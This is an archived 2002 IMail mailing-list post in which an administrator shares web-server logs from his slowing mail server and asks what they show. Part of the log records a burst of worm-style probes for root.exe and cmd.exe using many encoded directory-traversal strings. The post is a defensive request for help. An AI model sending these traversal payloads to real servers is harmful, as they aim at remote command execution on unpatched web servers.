[IMail Forum] Need Help - Virus Attack?

Dan Star Wed, 06 Mar 2002 12:51:38 -0800

Hi,

Recently our iMail server bogs down about every 3 days to the point
where mail delivery is delayed.  I determined that restarting WEB
Messaging fixes the problem until it happens again.  The following are
some WEB log entries that indicate an attack from a client browser, but
I don't know enough about HTML (and HTML viruses) to know exactly what
is happening:


********* log file *********
20020305 200746 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 200806 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98)  GET /login.cgi?_ HTTP/1.1.
20020305 200806 Request processed with no referer and user agent
192.168.1.1.
20020305 200806 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98) http://www.myetco.net/login.cgi?_ GET /imailc.gif HTTP/1.1.
20020305 200806 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98) http://www.myetco.net/login.cgi?_ GET /imailc.gif HTTP/1.1.
20020305 200812 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98) http://www.myetco.net/login.cgi?_ POST /login.cgi HTTP/1.1.
20020305 200812 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98) http://www.myetco.net/login.cgi?_ GET
/Xaee99bcbcf9cc89f9ac96a02abab/menu.cgi HTTP/1.1.
20020305 200815 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/menu.cgi
GET /Xaee99bcbcf9cc89f9ac96a02abab/imailc.gif HTTP/1.1.
20020305 200819 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98) http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/menu.cgi
GET
/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main
HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98)
http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main
GET /Xaee99bcbcf9cc89f9ac96a02abab/del.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98)
http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main
GET /Xaee99bcbcf9cc89f9ac96a02abab/descend.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98)
http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main
GET /Xaee99bcbcf9cc89f9ac96a02abab/mail.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98)
http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main
GET /Xaee99bcbcf9cc89f9ac96a02abab/bottom.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98)
http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main
GET /Xaee99bcbcf9cc89f9ac96a02abab/top.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98)
http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main
GET /Xaee99bcbcf9cc89f9ac96a02abab/attach.gif HTTP/1.1.
20020305 200822 Info - 192.168.1.1 Mozilla/4.0 (compatible; MSIE 5.01;
Windows 98)
http://www.myetco.net/Xaee99bcbcf9cc89f9ac96a02abab/readmail.46979.cgi?uid=mikeschmeling&mbx=Main
GET /Xaee99bcbcf9cc89f9ac96a02abab/replied.gif HTTP/1.1.
20020305 200846 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 200947 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 201047 Info - 192.168.1.6   GET / HTTP/1.0.

[snip log] ....

20020305 224557 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 224658 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 224758 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 224859 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 224923 Info - 192.168.1.1   GET /scripts/root.exe?/c+dir
HTTP/1.0.
20020305 224923 Request processed with no user agent and no referer.
20020305 224924 Info - 192.168.1.1   GET /MSADC/root.exe?/c+dir
HTTP/1.0.
20020305 224924 Request processed with no user agent and no referer.
20020305 224925 Info - 192.168.1.1   GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224925 Request processed with no user agent and no referer.
20020305 224927 Info - 192.168.1.1   GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224927 Request processed with no user agent and no referer.
20020305 224928 Info - 192.168.1.1   GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224928 Request processed with no user agent and no referer.
20020305 224930 Info - 192.168.1.1   GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0.
20020305 224930 Request processed with no user agent and no referer.
20020305 224931 Info - 192.168.1.1   GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0.
20020305 224931 Request processed with no user agent and no referer.
20020305 224933 Info - 192.168.1.1   GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0.
20020305 224933 Request processed with no user agent and no referer.
20020305 224934 Info - 192.168.1.1   GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224934 Request processed with no user agent and no referer.
20020305 224936 Info - 192.168.1.1   GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224936 Request processed with no user agent and no referer.
20020305 224937 Info - 192.168.1.1   GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224937 Request processed with no user agent and no referer.
20020305 224939 Info - 192.168.1.1   GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224939 Request processed with no user agent and no referer.
20020305 224940 Info - 192.168.1.1   GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224940 Request processed with no user agent and no referer.
20020305 224941 Info - 192.168.1.1   GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224941 Request processed with no user agent and no referer.
20020305 224943 Info - 192.168.1.1   GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224943 Request processed with no user agent and no referer.
20020305 224945 Info - 192.168.1.1   GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020305 224945 Request processed with no user agent and no referer.
20020305 224959 Info - 192.168.1.6   GET / HTTP/1.0.

[snip log] ....

20020305 231009 Socket Error - 192.168.1.6 Error while writing sockect
due to error 10055 or malicious connection type.
20020305 231109 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 231109 Socket Error - 192.168.1.6 Error while writing sockect
due to error 10055 or malicious connection type.
20020305 231210 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 231210 Socket Error - 192.168.1.6 Error while writing sockect
due to error 10055 or malicious connection type.
20020305 231311 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 231311 Socket Error - 192.168.1.6 Error while writing sockect
due to error 10055 or malicious connection type.
20020305 231411 Info - 192.168.1.6   GET / HTTP/1.0.
20020305 231411 Socket Error - 192.168.1.6 Error while writing sockect
due to error 10055 or malicious connection type.
20020305 231512 Info - 192.168.1.6   GET / HTTP/1.0.
********* log file *********

Our mail server is in a DMZ where external HTTP requests are mapped from
80 to 8383.  Could someone tell what these log entries indicate and how
to prevent this?

Regards,
Dan


Please visit http://www.ipswitch.com/support/mailing-lists.html 
to be removed from this list.

An Archive of this list is available at:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/

[IMail Forum] Need Help - Virus Attack?

Reply via email to